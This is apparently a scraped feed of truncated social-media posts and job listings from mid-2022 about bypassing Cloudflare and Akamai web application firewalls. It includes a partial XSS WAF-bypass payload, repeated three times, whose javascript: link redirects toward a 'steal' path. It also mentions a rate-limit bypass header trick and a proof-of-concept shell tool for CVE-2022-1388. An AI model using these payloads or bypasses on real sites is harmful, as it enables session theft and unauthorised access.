I still hold the maybe unpopular opinion that WAF products have done more damage to AppSec than they actually help, more times than not they are used ...June 4, 2022
? Package of the Day ?
cloudflare-bypasser
https://t.co/GCc1fr8fLu
A simple enough module to bypass Cloudflare's anti-bot page ("I'm Under Attack Mo ...June 4, 2022
New Cloudflare WAF Bypass to Fetch Cookie and Escalating XSS to Account Takeover.
As if you use document.location=URI (Blocked)
but using location=`UR ...June 4, 2022
Tristemente (para mí que el bot era como mi primer hijo) la página https://t.co/nwJPjRXjWe agregó cloudflare V2, así que por ahora no logro ver co ...June 3, 2022
I created PoC tool with interactive shell for exploiting #CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in #Rust with #PoC Lab.
Tool ...June 1, 2022
Did you know that a misconfigured server can lead to web application firewall (WAF) bypass?
Read our latest tech blog to find out how: https://t.co/j ...May 31, 2022
I love writing web automation scripts but never used Puppeteer before. Today, I was able to write a script to bypass cloudflare captcha by using this ...May 31, 2022
Does anyone know a bypass for the `</script>` in the urlencoded request body for cloudflare #waf ? It's a post based xss, so it should be possib ...May 31, 2022
#Linux #SystemAdmin Installation of CentOS pro on vps: I am using the cpanel of namecheap but now I need vps of contabo with centosOS pro installation ...May 31, 2022
Create scraping API which emulates Chrome TLS fingerprint -- 2 https://t.co/8quhJrNYqZ I want someone to create this https://t.co/cSSwT40FRI , it used ...May 29, 2022
Create scraping API which emulates Chrome TLS fingerprint -- 2 https://t.co/ocRdysq7kH I want someone to create this https://t.co/qFdAep2RZz , it used ...May 29, 2022
Tip about Rate Limit Bypass using X-Forwarded-For. By @BountyOverflow
Think about other header fields, CSP, payloads sended, X-forwarded-for n others ...May 29, 2022
Akamai XSS WAF bypass. Working in all browsers.
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stea ...May 29, 2022
Looking Python and Node Js Developer For API Development -- 2 https://t.co/MF35GEERZ5 I Have Complete API Code In Node Js and i am getting Error 403 ...May 28, 2022
Has anyone faced the Cloudflare problem where responses always bypass the cache no matter what you do?
• using Cache Everything rule
• no cookies ...May 27, 2022
#Linux #PHP Send me SMS when there are WAF logs: Send me SMS via shell script when there are WAF (Budget: ?600 - ?1500 INR, Jobs: Linux, PHP, Script I ...May 27, 2022
Akamai XSS WAF bypass. Working in all browsers.
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stea ...May 27, 2022
Akamai XSS WAF bypass. Working in all browsers.
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stea ...May 25, 2022
The CVE-2022-1388 flaw allows attackers to bypass user authentication on web-exposed iControl interfaces, allowing them to execute arbitrary commands, ...May 24, 2022